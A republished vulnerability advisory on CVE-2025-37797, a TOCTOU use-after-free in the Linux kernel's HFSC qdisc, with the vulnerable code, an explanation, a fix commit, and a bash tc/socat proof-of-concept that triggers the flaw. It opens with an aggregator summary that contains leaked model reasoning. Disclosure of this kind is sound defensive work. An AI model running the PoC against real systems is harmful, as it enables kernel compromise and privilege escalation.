(CVE-2025-37797) Linux Kernel hfsc_change_class TOCTOU Leading to Use-After-Free and Local Privilege Escalation

(CVE-2025-37797) Linux Kernel hfsc_change_class TOCTOU Leading to Use-After-Free and Local Privilege Escalation
好的，我现在需要帮用户总结这篇文章的内容，控制在100个字以内。首先，我得仔细阅读文章，找出关键信息。文章标题是“Advisory”，日期是2025年5月2日，作者是Gerrard Tai。内容涉及一个CVE漏洞，编号是CVE-2025-37797，影响Linux内核的多个稳定分支，版本到6.15-rc。CVSS评分是7.8（高）和8.5（CVSS4.0），说明风险较高。漏洞类型是CWE-416：使用后释放（UAF），攻击向量是本地攻击，不需要用户交互。技术细节中提到，在hfsc_change_class函数中存在TOCTOU问题，导致空类被插入到vttree，从而引发UAF和本地权限提升。修复建议是升级到指定的提交版本，并提到了类似的CVE-2023-4623漏洞。此外，还有PoC脚本和参考链接。现在要将这些信息浓缩到100字以内。重点包括：Linux内核漏洞、HFSC qdisc中的UAF、影响版本、攻击向量、修复方法和风险等级。确保语言简洁明了，不使用总结性的开头词。直接描述内容即可。 </think> Linux内核HFSC qdisc组件发现一个高危漏洞（CVE-2025-37797），攻击者可利用该漏洞实现本地权限提升。该漏洞源于hfsc_change_class函数中的TOCTOU问题，导致空类被插入vttree并引发use-after-free。修复建议升级至指定提交版本以避免风险。 2025-5-2 00:0:0 Author: starlabs.sg(查看原文) 阅读量:2 收藏

Advisory May 2, 2025 By Gerrard Tai 3 min read

CVE: CVE-2025-37797

Affected Versions: Linux kernel (multiple stable branches through 6.15-rc)

CVSS3.1: 7.8 (High) — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

Product	Linux Kernel (net_sched)
Vendor	Linux Kernel
Severity	High — a local unprivileged attacker may exploit this to achieve local privilege escalation
Affected Versions	Linux kernel (multiple stable branches through 6.15-rc)
CVE Identifier	CVE-2025-37797
CVE Description	A TOCTOU flaw in the Linux kernel HFSC qdisc’s hfsc_change_class allows an empty class to be inserted into the vttree, leading to a use-after-free and local privilege escalation
CWE Classification(s)	CWE-416: Use After Free

CVSS4.0 Scoring System

Base Score: 8.5 Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Metric	Value
Attack Vector (AV)	Local
Attack Complexity (AC)	Low
Attack Requirements (AT)	None
Privileges Required (PR)	Low
User Interaction (UI)	None
Vulnerable System Confidentiality (VC)	High
Vulnerable System Integrity (VI)	High
Vulnerable System Availability (VA)	High
Subsequent System Confidentiality (SC)	None
Subsequent System Integrity (SI)	None
Subsequent System Availability (SA)	None

Technical Details

A use-after-free vulnerability in the Linux Kernel net scheduler subsystem can be exploited to achieve local privilege escalation. In the hfsc_change_class routine, it is possible to peek and empty a child qdisc. Subsequently, there is no check that the child qdisc is empty before adding the class to the hfsc qdisc’s internal trees. This causes a use-after-free vulnerability. We recommend upgrading past commit 3df275ef0a6ae181e8428a6589ef5d5231e58b5c

The vulnerability lies in the hfsc_change_class() function.

	if (cl->qdisc->q.qlen != 0) {                      // [1]
		int len = qdisc_peek_len(cl->qdisc);           // [2]

		if (cl->cl_flags & HFSC_RSC) {
			if (old_flags & HFSC_RSC)
				update_ed(cl, len);
			else
				init_ed(cl, len);
		}

		if (cl->cl_flags & HFSC_FSC) {
			if (old_flags & HFSC_FSC)
				update_vf(cl, 0, cur_time);
			else
				init_vf(cl, len);                      // [3]
		}
	}

The logic of [1] and [3] is to add non-empty classes to the hfsc’s vttree. However, it is possible for a qdisc to be non-empty at [1], but the call to qdisc_peek_len ([2]) empties it. This is not checked for, leading to the activation of an empty class. This breaks the logic of hfsc, which relies on update_vf() to be called whenever the child qdisc is emptied (e.g. from hfsc_dequeue() or hfsc_qlen_notify()). Since the class is already empty, there will be no subsequent calls to update_vf(), allowing the class to be deleted without first removing it from vttree. This leads to UAF, which can be escalated to LPE as demonstrated in https://github.com/google/security-research/blob/a42a2e8be65216409760099dd464f9e0e70b08e3/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md

Proof of Concept

#!/bin/bash

IP=/mnt/iproute2-next/ip/ip
TC=/mnt/iproute2-next/tc/tc
SOCAT=socat

$IP link set dev lo up
$TC qdisc add dev lo handle 1:0 root drr
$TC class add dev lo parent 1:0 classid 1:1 drr
$TC class add dev lo parent 1:0 classid 1:2 drr

$TC qdisc add dev lo handle 2:0 parent 1:1 plug limit 1024
echo "" | $SOCAT -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))

$TC qdisc add dev lo parent 1:2 handle 3:0 hfsc default 1
$TC class add dev lo parent 3:0 classid 3:1 hfsc \
    rt m1 5Mbit d 10ms m2 10Mbit
$TC qdisc add dev lo parent 3:1 handle 4:0 netem delay 1ms
$TC qdisc add dev lo parent 4:1 handle 5:0 blackhole
echo "" | $SOCAT -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))

$TC class change dev lo parent 3:0 classid 3:1 hfsc \
sc m1 5Mbit d 10ms m2 10Mbit

$TC class del dev lo parent 3:0 classid 3:1

$TC class add dev lo parent 3:0 classid 3:1 hfsc \
    rt m1 5Mbit d 10ms m2 10Mbit

echo "" | $SOCAT -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))

Fix

Upgrade past commit 3df275ef.

References

CVE-2023-4623 — similar HFSC vttree UAF

Credit

Gerrard Tai of STAR Labs SG Pte. Ltd.

Timeline

2025-04-10 — Reported to Linux Kernel Security Team
2025-05-02 — CVE-2025-37797 published

文章来源: https://starlabs.sg/advisories/25/25-37797/
如有侵权请联系:admin#unsafe.sh